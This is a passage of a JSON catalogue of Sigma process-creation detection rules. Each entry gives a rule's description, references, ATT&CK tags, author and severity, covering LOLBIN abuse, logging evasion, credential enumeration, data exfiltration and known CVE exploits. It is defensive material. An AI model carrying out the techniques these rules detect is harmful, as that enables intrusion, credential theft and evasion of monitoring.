execute unsigned code", - "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", - "https://twitter.com/_felamos/status/1204705548668555264", - "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_dotnet.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Dsacls to grant over permissive permissions", - "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", - "value": "Abusing Permissions Using Dsacls", - "meta": { - "refs": [ - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_dsacls_abuse_permissions.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administrators granting over permissive permissions to users" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible password spraying attempts using Dsacls", - "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", - "value": "Password Spraying Attempts Using Dsacls", - "meta": { - "refs": [ - 
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_dsacls_password_spray.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of dsacls to bind to an LDAP session" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", - "value": "Dism Remove Online Package", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_dsim_remove.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "uuid": 
"4f647cfa-b598-4e12-ad69-c68dd16caef8", - "value": "DumpStack.log Defender Evasion", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1479094189048713219", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/06", - "filename": "proc_creation_win_dumpstack_log_evasion.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects email exfiltration via powershell cmdlets", - "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", - "value": "Email Exifiltration Via Powershell", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_email_exfil_via_powershell.yml", - "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "value": "Hidden Powershell in Link File Pattern", - "meta": { - "refs": [ - "https://www.x86matthew.com/view_post?id=embed_exe_lnk", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/02/06", - "filename": "proc_creation_win_embed_exe_lnk.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate commands in .lnk files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a base64 encoded FromBase64String keyword in a process command line", - "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "value": "Encoded FromBase64String", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/24", - "filename": "proc_creation_win_encoded_frombase64string.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a base64 encoded IEX command string in a process command line", - "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", - "value": "Encoded IEX", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/23", - "filename": "proc_creation_win_encoded_iex.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", - "value": 
"Enumeration for 3rd Party Creds From CLI", - "meta": { - "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "value": "Enumeration for Credentials in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "value": "Esentutl Steals Browser Information", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_esentutl_webcache.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "41421f44-58f9-455d-838a-c398859841d4", - "value": "COMPlus_ETWEnabled Command Line Arguments", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - 
"https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_etw_modification_cmdline.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "value": "Disable of ETW Trace", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ], - "creation_date": "2019/03/22", - "filename": "proc_creation_win_etw_trace_evasion.yml", - "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", - "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "value": "WinRM Access with Evil-WinRM", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", - "https://github.com/Hackplayers/evil-winrm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2022/01/07", - "filename": "proc_creation_win_evil_winrm.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", - "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", - "value": "Execution via MSSQL Xp_cmdshell Stored Procedure", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of well known tools for data exfiltration and tunneling", - "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "value": "Exfiltration and Tunneling Tools Execution", - "meta": { - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate Administrator using tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various cli utility related to web request exfiltrating data", - "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", - "value": "Possible Exfiltration Of Data Via CLI", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_exfil_data_via_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "uuid": "9f107a84-532c-41af-b005-8d12a607639f", - "value": "Cabinet File Expansion", - "meta": { - "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2021/07/30", - "filename": "proc_creation_win_expand_cabinet_files.yml", - "author": "Bhabesh Raj", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "value": "Exploit for CVE-2015-1641", - "meta": { - "refs": [ - "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2018/02/22", - "filename": "proc_creation_win_exploit_cve_2015_1641.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", - "value": "Exploit for CVE-2017-0261", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" 
- ], - "creation_date": "2018/02/22", - "filename": "proc_creation_win_exploit_cve_2017_0261.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "value": "Droppers Exploiting CVE-2017-11882", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2017/11/23", - "filename": "proc_creation_win_exploit_cve_2017_11882.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", - "value": "Exploit for CVE-2017-8759", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2017/09/15", - "filename": "proc_creation_win_exploit_cve_2017_8759.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "value": "Exploiting SetupComplete.cmd CVE-2019-1378", - "meta": { - "refs": [ - "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" - ], - "creation_date": "2019/11/15", - "filename": "proc_creation_win_exploit_cve_2019_1378.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "value": "Exploiting CVE-2019-1388", - "meta": { - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", - 
"https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2019/11/20", - "filename": "proc_creation_win_exploit_cve_2019_1388.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", - "value": "Exploited CVE-2020-10189 Zoho ManageEngine", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" - ], - "creation_date": "2020/03/25", - "filename": "proc_creation_win_exploit_cve_2020_10189.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects new commands that add new printer port which point to suspicious file", - "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", - "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "meta": { - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/05/13", - "filename": "proc_creation_win_exploit_cve_2020_1048.yml", - "author": "EagleEye Team, Florian Roth", - "level": "high", - "falsepositive": [ - "New printer port install on host" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", - "value": "DNS RCE CVE-2020-1350", - "meta": { - "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/07/15", - "filename": "proc_creation_win_exploit_cve_2020_1350.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", - "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379", - "meta": { - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/11/22", - "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", - "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "value": "SystemNightmare Exploitation Script Execution", - "meta": { - "refs": [ - "https://github.com/GossiTheDog/SystemNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/08/11", - "filename": "proc_creation_win_exploit_systemnightmare.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", - "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", - "value": "False Sysinternals Suite Tools", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_false_sysinternalsuite.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": 
"windows" - } - }, - { - "description": "Detects a file or folder's permissions being modified or tampered with.", - "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "value": "File or Folder Permissions Modifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_file_permission_modifications.yml", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", - "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "value": "Findstr GPP Passwords", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2021/12/27", - "filename": "proc_creation_win_findstr_gpp_passwords.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "value": "Findstr LSASS", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_findstr_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of findstr with the \"EVERYONE\" keyword. 
